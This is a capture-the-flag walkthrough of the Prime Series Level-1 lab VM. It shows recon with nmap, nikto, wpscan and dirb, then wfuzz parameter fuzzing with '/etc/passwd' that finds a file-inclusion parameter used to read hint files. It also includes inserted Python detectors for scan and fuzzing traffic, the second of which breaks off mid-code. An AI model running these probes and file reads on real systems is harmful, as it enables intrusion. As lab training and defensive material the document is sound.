• Prime_Series_Level-1


    Download link: click here

    Bilibili (video walkthrough): click here

    Information Gathering

    • After downloading and extracting the archive, import it into the VM software. The target turns out to be an Ubuntu box, a desktop edition at that.
    • Set the network adapter to Host-Only, i.e. vmnet1, whose subnet is 192.168.116.1/24.
    • First, use nmap to find live hosts.
    ➜  ~ nmap -sn  192.168.116.1/24 
    Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-20 07:16 CST
    Nmap scan report for 192.168.116.1
    Host is up (0.00044s latency).
    Nmap scan report for 192.168.116.132
    Host is up (0.00063s latency).
    Nmap done: 256 IP addresses (2 hosts up) scanned in 2.54 seconds
    ➜  ~
    
    • The target IP is 192.168.116.132; next, scan it for open ports and services.
    ➜  ~ nmap -A -T4 192.168.116.132
    Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-20 07:17 CST
    Nmap scan report for 192.168.116.132
    Host is up (0.0013s latency).
    Not shown: 998 closed ports
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey: 
    |   2048 8d:c5:20:23:ab:10:ca:de:e2:fb:e5:cd:4d:2d:4d:72 (RSA)
    |   256 94:9c:f8:6f:5c:f1:4c:11:95:7f:0a:2c:34:76:50:0b (ECDSA)
    |_  256 4b:f6:f1:25:b6:13:26:d4:fc:9e:b0:72:9f:f4:69:68 (ED25519)
    80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
    |_http-server-header: Apache/2.4.18 (Ubuntu)
    |_http-title: HacknPentest
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 7.13 seconds
    
    • Port 80 is open, and the usual entry point is the web application. Opening it in a browser shows only a single image; the developer tools (F12) turn up nothing.
    • Start with a nikto scan.
    ➜  ~ nikto --host http://192.168.116.132/
    - Nikto v2.1.6
    ---------------------------------------------------------------------------
    + Target IP:          192.168.116.132
    + Target Hostname:    192.168.116.132
    + Target Port:        80
    + Start Time:         2019-09-20 07:22:14 (GMT8)
    ---------------------------------------------------------------------------
    + Server: Apache/2.4.18 (Ubuntu)
    + The anti-clickjacking X-Frame-Options header is not present.
    + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
    + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
    + No CGI Directories found (use '-C all' to force check all possible dirs)
    + Web Server returns a valid response with junk HTTP methods, this may cause false positives.
    + Server leaks inodes via ETags, header found with file /icons/README, fields: 0x13f4 0x438c034968a80 
    + OSVDB-3233: /icons/README: Apache default file found.
    + Uncommon header 'link' found, with contents: <http://192.168.116.132/wordpress/index.php?rest_route=/>; rel="https://api.w.org/"
    + /wordpress/: A Wordpress installation was found.
    + 7535 requests: 0 error(s) and 8 item(s) reported on remote host
    + End Time:           2019-09-20 07:22:26 (GMT8) (12 seconds)
    ---------------------------------------------------------------------------
    + 1 host(s) tested
    
    ➜  ~ wpscan --url http://192.168.116.132/wordpress/
    _______________________________________________________________
    
            WordPress Security Scanner by the WPScan Team
                           Version 3.6.3
              Sponsored by Sucuri - https://sucuri.net
          @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
    _______________________________________________________________
    
    [+] URL: http://192.168.116.132/wordpress/
    [+] Started: Fri Sep 20 07:56:20 2019
    
    Interesting Finding(s):
    
    [+] http://192.168.116.132/wordpress/
     | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
     | Found By: Headers (Passive Detection)
     | Confidence: 100%
    
    [+] http://192.168.116.132/wordpress/xmlrpc.php
     | Found By: Direct Access (Aggressive Detection)
     | Confidence: 100%
     | References:
     |  - http://codex.wordpress.org/XML-RPC_Pingback_API
     |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
     |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
     |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
     |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
    
    [+] http://192.168.116.132/wordpress/readme.html
     | Found By: Direct Access (Aggressive Detection)
     | Confidence: 100%
    
    [+] Upload directory has listing enabled: http://192.168.116.132/wordpress/wp-content/uploads/
     | Found By: Direct Access (Aggressive Detection)
     | Confidence: 100%
    
    [+] http://192.168.116.132/wordpress/wp-cron.php
     | Found By: Direct Access (Aggressive Detection)
     | Confidence: 60%
     | References:
     |  - https://www.iplocation.net/defend-wordpress-from-ddos
     |  - https://github.com/wpscanteam/wpscan/issues/1299
    
    [+] WordPress version 5.2.2 identified (Insecure, released on 2019-06-18).
     | Detected By: Rss Generator (Passive Detection)
     |  - http://192.168.116.132/wordpress/?feed=rss2, <generator>https://wordpress.org/?v=5.2.2</generator>
     |  - http://192.168.116.132/wordpress/?feed=comments-rss2, <generator>https://wordpress.org/?v=5.2.2</generator>
     |
     | [!] 6 vulnerabilities identified:
     |
     | [!] Title: WordPress 5.2.2 - Cross-Site Scripting (XSS) in Stored Comments
     |     Fixed in: 5.2.3
     |     References:
     |      - https://wpvulndb.com/vulnerabilities/9861
     |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16218
     |      - https://wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
     |
     | [!] Title: WordPress 5.2.2 - Authenticated Cross-Site Scripting (XSS) in Post Previews
     |     Fixed in: 5.2.3
     |     References:
     |      - https://wpvulndb.com/vulnerabilities/9862
     |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16223
     |      - https://wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
     |
     | [!] Title: WordPress 5.2.2 - Potential Open Redirect
     |     Fixed in: 5.2.3
     |     References:
     |      - https://wpvulndb.com/vulnerabilities/9863
     |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16220
     |      - https://wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
     |      - https://github.com/WordPress/WordPress/commit/c86ee39ff4c1a79b93c967eb88522f5c09614a28
     |
     | [!] Title: WordPress 5.0-5.2.2 - Authenticated Stored XSS in Shortcode Previews
     |     Fixed in: 5.2.3
     |     References:
     |      - https://wpvulndb.com/vulnerabilities/9864
     |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16219
     |      - https://wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
     |      - https://fortiguard.com/zeroday/FG-VD-18-165
     |      - https://www.fortinet.com/blog/threat-research/wordpress-core-stored-xss-vulnerability.html
     |
     | [!] Title: WordPress 5.2.2 - Cross-Site Scripting (XSS) in Dashboard
     |     Fixed in: 5.2.3
     |     References:
     |      - https://wpvulndb.com/vulnerabilities/9865
     |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16221
     |      - https://wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
     |
     | [!] Title: WordPress <= 5.2.2 - Cross-Site Scripting (XSS) in URL Sanitisation
     |     Fixed in: 5.2.3
     |     References:
     |      - https://wpvulndb.com/vulnerabilities/9867
     |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16222
     |      - https://wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
     |      - https://github.com/WordPress/WordPress/commit/30ac67579559fe42251b5a9f887211bf61a8ed68
    
    [+] WordPress theme in use: twentynineteen
     | Location: http://192.168.116.132/wordpress/wp-content/themes/twentynineteen/
     | Latest Version: 1.4 (up to date)
     | Last Updated: 2019-05-07T00:00:00.000Z
     | Readme: http://192.168.116.132/wordpress/wp-content/themes/twentynineteen/readme.txt
     | Style URL: http://192.168.116.132/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.4
     | Style Name: Twenty Nineteen
     | Style URI: https://wordpress.org/themes/twentynineteen/
     | Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
     | Author: the WordPress team
     | Author URI: https://wordpress.org/
     |
     | Detected By: Css Style (Passive Detection)
     |
     | Version: 1.4 (80% confidence)
     | Detected By: Style (Passive Detection)
     |  - http://192.168.116.132/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.4, Match: 'Version: 1.4'
    
    [+] Enumerating All Plugins (via Passive Methods)
    
    [i] No plugins Found.
    
    [+] Enumerating Config Backups (via Passive and Aggressive Methods)
     Checking Config Backups - Time: 00:00:00 <==================================================================================================================================================================> (21 / 21) 100.00% Time: 00:00:00
    
    [i] No Config Backups Found.
    
    
    [+] Finished: Fri Sep 20 07:56:22 2019
    [+] Requests Done: 49
    [+] Cached Requests: 5
    [+] Data Sent: 12.599 KB
    [+] Data Received: 462.296 KB
    [+] Memory used: 184.582 MB
    [+] Elapsed time: 00:00:02
    ➜  ~
    
    • Nothing much of note, apart from a listable directory index at http://192.168.116.132/wordpress/wp-content/uploads/2019/08/. Move on to directory brute forcing.
    ➜  ~ dirb http://192.168.116.132/
    
    -----------------
    DIRB v2.22    
    By The Dark Raver
    -----------------
    
    START_TIME: Fri Sep 20 08:11:33 2019
    URL_BASE: http://192.168.116.132/
    WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
    
    -----------------
    
    GENERATED WORDS: 4612                                                          
    
    ---- Scanning URL: http://192.168.116.132/ ----
    + http://192.168.116.132/dev (CODE:200|SIZE:131)                                                                                                                                                                                              
    + http://192.168.116.132/index.php (CODE:200|SIZE:136)                                                                                                                                                                                        
    ==> DIRECTORY: http://192.168.116.132/javascript/                                                                                                                                                                                             
    + http://192.168.116.132/server-status (CODE:403|SIZE:303)                                                                                                                                                                                    
    ==> DIRECTORY: http://192.168.116.132/wordpress/                                                                                                                                                                                              
                                                                                                                                                                                                                                                  
    ---- Entering directory: http://192.168.116.132/javascript/ ----
    ==> DIRECTORY: http://192.168.116.132/javascript/jquery/                                                                                                                                                                                      
                                                                                                                                                                                                                                                  
    ---- Entering directory: http://192.168.116.132/wordpress/ ----
    + http://192.168.116.132/wordpress/index.php (CODE:301|SIZE:0)                                                                                                                                                                                
    ==> DIRECTORY: http://192.168.116.132/wordpress/wp-admin/                                                                                                                                                                                     
    ==> DIRECTORY: http://192.168.116.132/wordpress/wp-content/                                                                                                                                                                                   
    ==> DIRECTORY: http://192.168.116.132/wordpress/wp-includes/                                                                                                                                                                                  
    + http://192.168.116.132/wordpress/xmlrpc.php (CODE:405|SIZE:42)                                                                                                                                                                              
                                                                                                                                                                                                                                                  
    ---- Entering directory: http://192.168.116.132/javascript/jquery/ ----
    + http://192.168.116.132/javascript/jquery/jquery (CODE:200|SIZE:284394)                                                                                                                                                                      
                                                                                                                                                                                                                                                  
    ---- Entering directory: http://192.168.116.132/wordpress/wp-admin/ ----
    + http://192.168.116.132/wordpress/wp-admin/admin.php (CODE:302|SIZE:0)                                                                                                                                                                       
    ==> DIRECTORY: http://192.168.116.132/wordpress/wp-admin/css/                                                                                                                                                                                 
    ==> DIRECTORY: http://192.168.116.132/wordpress/wp-admin/images/                                                                                                                                                                              
    ==> DIRECTORY: http://192.168.116.132/wordpress/wp-admin/includes/                                                                                                                                                                            
    + http://192.168.116.132/wordpress/wp-admin/index.php (CODE:302|SIZE:0)                                                                                                                                                                       
    ==> DIRECTORY: http://192.168.116.132/wordpress/wp-admin/js/                                                                                                                                                                                  
    ==> DIRECTORY: http://192.168.116.132/wordpress/wp-admin/maint/                                                                                                                                                                               
    ==> DIRECTORY: http://192.168.116.132/wordpress/wp-admin/network/                                                                                                                                                                             
    ==> DIRECTORY: http://192.168.116.132/wordpress/wp-admin/user/                                                                                                                                                                                
                                                                                                                                                                                                                                                  
    ---- Entering directory: http://192.168.116.132/wordpress/wp-content/ ----
    + http://192.168.116.132/wordpress/wp-content/index.php (CODE:200|SIZE:0)                                                                                                                                                                     
    ==> DIRECTORY: http://192.168.116.132/wordpress/wp-content/plugins/                                                                                                                                                                           
    ==> DIRECTORY: http://192.168.116.132/wordpress/wp-content/themes/                                                                                                                                                                            
    ==> DIRECTORY: http://192.168.116.132/wordpress/wp-content/uploads/                                                                                                                                                                           
                                                                                                                                                                                                                                                  
    ---- Entering directory: http://192.168.116.132/wordpress/wp-includes/ ----
    (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
        (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                                  
    ---- Entering directory: http://192.168.116.132/wordpress/wp-admin/css/ ----
    (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
        (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                                  
    ---- Entering directory: http://192.168.116.132/wordpress/wp-admin/images/ ----
    (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
        (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                                  
    ---- Entering directory: http://192.168.116.132/wordpress/wp-admin/includes/ ----
    (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
        (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                                  
    ---- Entering directory: http://192.168.116.132/wordpress/wp-admin/js/ ----
    (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
        (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                                  
    ---- Entering directory: http://192.168.116.132/wordpress/wp-admin/maint/ ----
    (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
        (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                                  
    ---- Entering directory: http://192.168.116.132/wordpress/wp-admin/network/ ----
    + http://192.168.116.132/wordpress/wp-admin/network/admin.php (CODE:302|SIZE:0)                                                                                                                                                               
    + http://192.168.116.132/wordpress/wp-admin/network/index.php (CODE:302|SIZE:0)                                                                                                                                                               
                                                                                                                                                                                                                                                  
    ---- Entering directory: http://192.168.116.132/wordpress/wp-admin/user/ ----
    + http://192.168.116.132/wordpress/wp-admin/user/admin.php (CODE:302|SIZE:0)                                                                                                                                                                  
    + http://192.168.116.132/wordpress/wp-admin/user/index.php (CODE:302|SIZE:0)                                                                                                                                                                  
                                                                                                                                                                                                                                                  
    ---- Entering directory: http://192.168.116.132/wordpress/wp-content/plugins/ ----
    + http://192.168.116.132/wordpress/wp-content/plugins/index.php (CODE:200|SIZE:0)                                                                                                                                                             
                                                                                                                                                                                                                                                  
    ---- Entering directory: http://192.168.116.132/wordpress/wp-content/themes/ ----
    + http://192.168.116.132/wordpress/wp-content/themes/index.php (CODE:200|SIZE:0)                                                                                                                                                              
                                                                                                                                                                                                                                                  
    ---- Entering directory: http://192.168.116.132/wordpress/wp-content/uploads/ ----
    (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
        (Use mode '-w' if you want to scan it anyway)
                                                                                   
    -----------------
    END_TIME: Fri Sep 20 08:12:01 2019
    DOWNLOADED: 46120 - FOUND: 15
    ➜  ~
    
    • There is a hint file, which marks stage 0. It says to use your tools to dig into the web application.
    ➜  ~ curl http://192.168.116.132/dev                                              
    hello,
    
    now you are at level 0 stage.
    
    In real life pentesting we should use our tools to dig on a web very hard.
    
    Happy hacking. 
    ➜  ~
    
    • Add the -X option to specify the file extensions to scan for.
    ➜  ~ dirb http://192.168.116.132/ -X .php,.txt
    
    -----------------
    DIRB v2.22    
    By The Dark Raver
    -----------------
    
    START_TIME: Fri Sep 20 08:18:05 2019
    URL_BASE: http://192.168.116.132/
    WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
    EXTENSIONS_LIST: (.php,.txt) | (.php)(.txt) [NUM = 2]
    
    -----------------
    
    GENERATED WORDS: 4612                                                          
    
    ---- Scanning URL: http://192.168.116.132/ ----
    + http://192.168.116.132/image.php (CODE:200|SIZE:147)                                                                
    + http://192.168.116.132/index.php (CODE:200|SIZE:136)                                                                
    + http://192.168.116.132/secret.txt (CODE:200|SIZE:412)                                                               
                                                                                                                          
    -----------------
    END_TIME: Fri Sep 20 08:18:10 2019
    DOWNLOADED: 9224 - FOUND: 3
    ➜  ~
    

    Fuzz

    • Another hint; time to get the fuzzing tools ready.
    ➜  ~ curl http://192.168.116.132/secret.txt     
    Looks like you have got some secrets.
    
    Ok I just want to do some help to you. 
    
    Do some more fuzz on every page of php which was finded by you. And if
    you get any right parameter then follow the below steps. If you still stuck 
    Learn from here a basic tool with good usage for OSCP.
    
    https://github.com/hacknpentest/Fuzzing/blob/master/Fuzz_For_Web
     
    
    
    //see the location.txt and you will get your next move//
    
    ➜  ~
    
    • The link leads to a wfuzz tutorial, but of course the wordlists themselves are not provided. Two fuzzing projects I recommend are https://github.com/fuzzdb-project/fuzzdb and https://github.com/danielmiessler/SecLists, which collect all kinds of common wordlists; fork one and add to it over time. I usually set an environment variable in my .zshrc that points at the wordlist directory, so I don't have to type the path every time.
    • This is exactly the same routine as in an earlier post of mine (see here): first find the files, then fuzz for the parameter name, much like brute-forcing the password parameter of a one-line webshell.
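    From the defender's side, both the dirb runs above and the parameter-name fuzzing described in this step leave a characteristic trail in the web server's access log: one client producing many distinct 404 paths, or many distinct query-parameter names against one script, in a short window. The Python below is an added example written for this write-up (not code from the original page or from the Prime VM) that flags both patterns; it assumes the Apache "combined" log format, and the log lines, thresholds and function names (parse_line, detect) are constructed for the illustration.

```python
"""Spot wordlist-driven directory scans and parameter-name fuzzing in an
Apache access log. Added example for this write-up; not code from the
original page or from the Prime VM. Lines, thresholds and names are constructed."""
import re
from collections import Counter
from datetime import datetime, timedelta
from urllib.parse import parse_qs, urlsplit

# Apache "combined" format: ip ident user [time] "METHOD target proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def parse_line(line):
    """Return (ip, timestamp, path, query parameter names, status), or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    url = urlsplit(m.group("target"))
    names = tuple(parse_qs(url.query, keep_blank_values=True))
    return m.group("ip"), ts, url.path, names, int(m.group("status"))


def max_distinct_in_window(items, window_seconds):
    """items: list of (timestamp, key). Largest number of distinct keys that
    fall inside any sliding window of window_seconds."""
    items = sorted(items, key=lambda x: x[0])
    window = timedelta(seconds=window_seconds)
    counts, best, left = Counter(), 0, 0
    for ts, key in items:
        counts[key] += 1
        while ts - items[left][0] > window:   # evict events that fell out of the window
            old = items[left][1]
            counts[old] -= 1
            if counts[old] == 0:
                del counts[old]
            left += 1
        best = max(best, len(counts))
    return best


def detect(lines, window_seconds=60, path_threshold=10, param_threshold=10):
    """Return [(client_ip, description)] for clients whose request pattern
    looks like a dirb-style path scan or a wfuzz-style parameter-name search."""
    not_found = {}     # ip -> [(ts, path)] for 404 responses
    param_names = {}   # (ip, path) -> [(ts, name)] for every query parameter seen
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, path, names, status = rec
        if status == 404:
            not_found.setdefault(ip, []).append((ts, path))
        for name in names:
            param_names.setdefault((ip, path), []).append((ts, name))

    findings = []
    for ip, items in not_found.items():
        n = max_distinct_in_window(items, window_seconds)
        if n >= path_threshold:
            findings.append((ip, f"directory brute force: {n} distinct 404 paths "
                                 f"within {window_seconds}s"))
    for (ip, path), items in param_names.items():
        n = max_distinct_in_window(items, window_seconds)
        if n >= param_threshold:
            findings.append((ip, f"parameter fuzzing on {path}: {n} distinct "
                                 f"parameter names within {window_seconds}s"))
    return findings


def _line(ip, second, target, status):
    """Build one constructed combined-format line (fixed date, varying second)."""
    return (f'{ip} - - [20/Sep/2019:08:11:{second:02d} +0800] '
            f'"GET {target} HTTP/1.1" {status} 275 "-" "-"')


# A dozen guesses of the kind found in CommonMethodNames.txt / common.txt.
WORDS = ["admin", "auth", "calc", "cancel", "change", "check",
         "click", "clear", "clone", "close", "create", "crypt"]

# Constructed log: one ordinary visitor, then one client running a path scan
# followed by a parameter-name search against index.php with a fixed value.
SAMPLE_LOG = (
    [_line("192.168.116.50", 1, "/wordpress/", 200),
     _line("192.168.116.50", 2, "/wordpress/?p=1", 200)]
    + [_line("192.168.116.1", i, f"/{w}", 404) for i, w in enumerate(WORDS)]
    + [_line("192.168.116.1", i, f"/index.php?{w}=x", 200) for i, w in enumerate(WORDS)]
)

if __name__ == "__main__":
    for ip, finding in detect(SAMPLE_LOG):
        print(ip, finding)
```

    Tune window_seconds and the two thresholds to the site's normal traffic; a CMS with many legitimate 404s needs a higher path_threshold than a single static page.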
    ➜  ~ wfuzz -c -w Kali-Team_Tools/fuzzdb/attack/business-logic/CommonMethodNames.txt 'http://192.168.116.132/index.php?FUZZ=/etc/passwd'        
    libraries.FileLoader: CRITICAL __load_py_from_file. Filename: /home/kali-team/.local/lib/python3.7/site-packages/wfuzz/plugins/payloads/bing.py Exception, msg=No module named 'shodan'
    libraries.FileLoader: CRITICAL __load_py_from_file. Filename: /home/kali-team/.local/lib/python3.7/site-packages/wfuzz/plugins/payloads/shodanp.py Exception, msg=No module named 'shodan'
    ********************************************************
    * Wfuzz 2.4 - The Web Fuzzer                           *
    ********************************************************
    
    Target: http://192.168.116.132/index.php?FUZZ=/etc/passwd
    Total requests: 77
    
    ===================================================================
    ID           Response   Lines    Word     Chars       Payload                                                                                                                                                                       
    ===================================================================
    
    000000001:   200        7 L      12 W     136 Ch      "0"                                                                                                                                                                           
    000000002:   200        7 L      12 W     136 Ch      "1"                                                                                                                                                                           
    000000003:   200        7 L      12 W     136 Ch      "add"                                                                                                                                                                         
    000000004:   200        7 L      12 W     136 Ch      "admin"                                                                                                                                                                       
    000000005:   200        7 L      12 W     136 Ch      "alert"                                                                                                                                                                       
    000000006:   200        7 L      12 W     136 Ch      "alter"                                                                                                                                                                       
    000000007:   200        7 L      12 W     136 Ch      "auth"                                                                                                                                                                        
    000000008:   200        7 L      12 W     136 Ch      "authenticate"                                                                                                                                                                
    000000009:   200        7 L      12 W     136 Ch      "append"                                                                                                                                                                      
    000000010:   200        7 L      12 W     136 Ch      "calc"                                                                                                                                                                        
    000000011:   200        7 L      12 W     136 Ch      "calculate"                                                                                                                                                                   
    000000012:   200        7 L      12 W     136 Ch      "cancel"                                                                                                                                                                      
    000000013:   200        7 L      12 W     136 Ch      "change"                                                                                                                                                                      
    000000014:   200        7 L      12 W     136 Ch      "check"                                                                                                                                                                       
    000000016:   200        7 L      12 W     136 Ch      "click"                                                                                                                                                                       
    000000015:   200        7 L      12 W     136 Ch      "clear"                                                                                                                                                                       
    000000017:   200        7 L      12 W     136 Ch      "clone"                                                                                                                                                                       
    000000018:   200        7 L      12 W     136 Ch      "close"                                                                                                                                                                       
    000000019:   200        7 L      12 W     136 Ch      "create"                                                                                                                                                                      
    000000020:   200        7 L      12 W     136 Ch      "crypt"                                                                                                                                                                       
    000000021:   200        7 L      12 W     136 Ch      "decrypt"                                                                                                                                                                     
    000000022:   200        7 L      12 W     136 Ch      "del"                                                                                                                                                                         
    000000023:   200        7 L      12 W     136 Ch      "delete"                                                                                                                                                                      
    000000024:   200        7 L      12 W     136 Ch      "demo"                                                                                                                                                                        
    000000025:   200        7 L      12 W     136 Ch      "disable"                                                                                                                                                                     
    000000026:   200        7 L      12 W     136 Ch      "dl"                                                                                                                                                                          
    000000027:   200        7 L      12 W     136 Ch      "download"                                                                                                                                                                    
    000000029:   200        7 L      12 W     136 Ch      "enable"                                                                                                                                                                      
    000000030:   200        7 L      12 W     136 Ch      "encrypt"                                                                                                                                                                     
    000000028:   200        7 L      12 W     136 Ch      "edit"                                                                                                                                                                        
    000000031:   200        7 L      12 W     136 Ch      "exec"                                                                                                                                                                        
    000000032:   200        7 L      12 W     136 Ch      "execute"                                                                                                                                                                     
    000000033:   200        7 L      19 W     206 Ch      "file"                                                                                                                                                                        
    000000034:   200        7 L      12 W     136 Ch      "focus"                                                                                                                                                                       
    000000035:   200        7 L      12 W     136 Ch      "get"                                                                                                                                                                         
    000000036:   200        7 L      12 W     136 Ch      "help"                                                                                                                                                                        
    000000037:   200        7 L      12 W     136 Ch      "initiate"                                                                                                                                                                    
    000000038:   200        7 L      12 W     136 Ch      "is"                                                                                                                                                                          
    000000041:   200        7 L      12 W     136 Ch      "ls"                                                                                                                                                                          
    000000042:   200        7 L      12 W     136 Ch      "make"                                                                                                                                                                        
    000000043:   200        7 L      12 W     136 Ch      "mod"                                                                                                                                                                         
    000000044:   200        7 L      12 W     136 Ch      "mode"                                                                                                                                                                        
    000000046:   200        7 L      12 W     136 Ch      "move"                                                                                                                                                                        
    000000047:   200        7 L      12 W     136 Ch      "new"                                                                                                                                                                         
    000000048:   200        7 L      12 W     136 Ch      "off"                                                                                                                                                                         
    000000049:   200        7 L      12 W     136 Ch      "on"                                                                                                                                                                          
    000000039:   200        7 L      12 W     136 Ch      "list"                                                                                                                                                                        
    000000040:   200        7 L      12 W     136 Ch      "load"                                                                                                                                                                        
    000000045:   200        7 L      12 W     136 Ch      "modify"                                                                                                                                                                      
    000000050:   200        7 L      12 W     136 Ch      "open"                                                                                                                                                                        
    000000054:   200        7 L      12 W     136 Ch      "put"                                                                                                                                                                         
    000000055:   200        7 L      12 W     136 Ch      "query"                                                                                                                                                                       
    000000056:   200        7 L      12 W     136 Ch      "read"                                                                                                                                                                        
    000000051:   200        7 L      12 W     136 Ch      "post"                                                                                                                                                                        
    000000052:   200        7 L      12 W     136 Ch      "proxy"                                                                                                                                                                       
    000000053:   200        7 L      12 W     136 Ch      "pull"                                                                                                                                                                        
    000000062:   200        7 L      12 W     136 Ch      "save"                                                                                                                                                                        
    000000058:   200        7 L      12 W     136 Ch      "rename"                                                                                                                                                                      
    000000060:   200        7 L      12 W     136 Ch      "retrieve"                                                                                                                                                                    
    000000061:   200        7 L      12 W     136 Ch      "run"                                                                                                                                                                         
    000000057:   200        7 L      12 W     136 Ch      "remove"                                                                                                                                                                      
    000000059:   200        7 L      12 W     136 Ch      "reset"                                                                                                                                                                       
    000000063:   200        7 L      12 W     136 Ch      "search"                                                                                                                                                                      
    000000064:   200        7 L      12 W     136 Ch      "send"                                                                                                                                                                        
    000000065:   200        7 L      12 W     136 Ch      "shell"                                                                                                                                                                       
    000000066:   200        7 L      12 W     136 Ch      "show"                                                                                                                                                                        
    000000070:   200        7 L      12 W     136 Ch      "to"                                                                                                                                                                          
    000000071:   200        7 L      12 W     136 Ch      "toggle"                                                                                                                                                                      
    000000072:   200        7 L      12 W     136 Ch      "update"                                                                                                                                                                      
    000000073:   200        7 L      12 W     136 Ch      "upload"                                                                                                                                                                      
    000000074:   200        7 L      12 W     136 Ch      "verify"                                                                                                                                                                      
    000000075:   200        7 L      12 W     136 Ch      "view"                                                                                                                                                                        
    000000076:   200        7 L      12 W     136 Ch      "vrfy"                                                                                                                                                                        
    000000067:   200        7 L      12 W     136 Ch      "snd"                                                                                                                                                                         
    000000068:   200        7 L      12 W     136 Ch      "subtract"                                                                                                                                                                    
    000000069:   200        7 L      12 W     136 Ch      "test"                                                                                                                                                                        
    000000077:   200        7 L      12 W     136 Ch      "with"                                                                                                                                                                        
    
    Total time: 0.083242
    Processed Requests: 77
    Filtered Requests: 0
    Requests/sec.: 925.0118
    
    ➜  ~ wfuzz -c --hh 136 -w Kali-Team_Tools/fuzzdb/attack/business-logic/CommonMethodNames.txt 'http://192.168.116.132/index.php?FUZZ=/etc/passwd'
    libraries.FileLoader: CRITICAL __load_py_from_file. Filename: /home/kali-team/.local/lib/python3.7/site-packages/wfuzz/plugins/payloads/bing.py Exception, msg=No module named 'shodan'
    libraries.FileLoader: CRITICAL __load_py_from_file. Filename: /home/kali-team/.local/lib/python3.7/site-packages/wfuzz/plugins/payloads/shodanp.py Exception, msg=No module named 'shodan'
    ********************************************************
    * Wfuzz 2.4 - The Web Fuzzer                           *
    ********************************************************
    
    Target: http://192.168.116.132/index.php?FUZZ=/etc/passwd
    Total requests: 77
    
    ===================================================================
    ID           Response   Lines    Word     Chars       Payload                                                                                                                                                                       
    ===================================================================
    
    000000033:   200        7 L      19 W     206 Ch      "file"                                                                                                                                                                        
    
    Total time: 0.118026
    Processed Requests: 77
    Filtered Requests: 76
    Requests/sec.: 652.3932
    ➜  ~
    
    • Fuzzing shows that index.php accepts a file parameter: http://192.168.116.132/index.php?file=/etc/passwd has a different response length from the home page seen earlier. Following the hint from before, try reading http://192.168.116.132/index.php?file=location.txt, which gives another hint.
    ➜  ~ curl http://192.168.116.132/index.php?file=location.txt                                 
    <html>
    <title>HacknPentest</title>
    <body>
     <img src='hacknpentest.png' alt='hnp security' width="1300" height="595" />
    </body>
    
    Do something better <br><br><br><br><br><br>ok well Now you reah at the exact parameter <br><br>Now dig some more for next one <br>use 'secrettier360' parameter on some other php page for more fun.
    </html>
    ➜  ~
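
    The fuzzing above finds the working parameter by the one response whose length differs, and every one of those requests, plus the file reads that follow, lands in Apache's access log. As an added example (not part of the original writeup), the Python below parses combined-format access log lines, flags parameter values that look like file-read attempts, and flags clients that cycle through many parameter names against one script. The log lines in it are constructed to mirror the requests in this writeup; they are not real captures.

```python
"""Spot LFI probing and parameter fuzzing in Apache access logs.

Added example, not from the original writeup. The log lines below are
constructed to look like what the wfuzz and curl requests in the writeup
would leave in the target's access.log; they are not real captures.
"""
import re
from collections import Counter, defaultdict
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache "combined" format: ip ident user [ts] "method target proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

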